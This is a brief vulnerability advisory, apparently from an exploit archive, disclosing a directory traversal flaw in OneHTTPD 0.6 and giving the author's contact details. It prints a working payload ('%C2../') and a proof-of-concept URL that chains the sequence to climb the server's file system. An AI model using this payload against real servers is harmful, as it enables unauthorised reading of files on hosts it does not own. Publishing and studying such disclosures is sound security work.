|=================================================================================================| | ___ ___ ___ ___ ___ ___ | | /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ | | /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ | | /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ | | /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ | | /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ | | \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / | | \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / | | \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ | | \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | | | \/__/ \/__/ \/__/ \/__/ \|__| | | | |=================================================================================================| | | | Vulnerability............Directory Traversal | | Software.................OneHTTPD 0.6 | | Download.................http://onehttpd.googlecode.com/files/onehttpd-0.6.exe | | Date.....................4/27/10 | | | |=================================================================================================| | | | Site.....................http://cross-site-scripting.blogspot.com/ | | Email....................john.leitch5@gmail.com | | | |=================================================================================================| | | | ##Description## | | | | It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a | | specially crafted URL. | | | | | | ##Exploit## | | | | %C2../ | | | | | | ##Proof of Concept## | | | | http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../ | | | |=================================================================================================|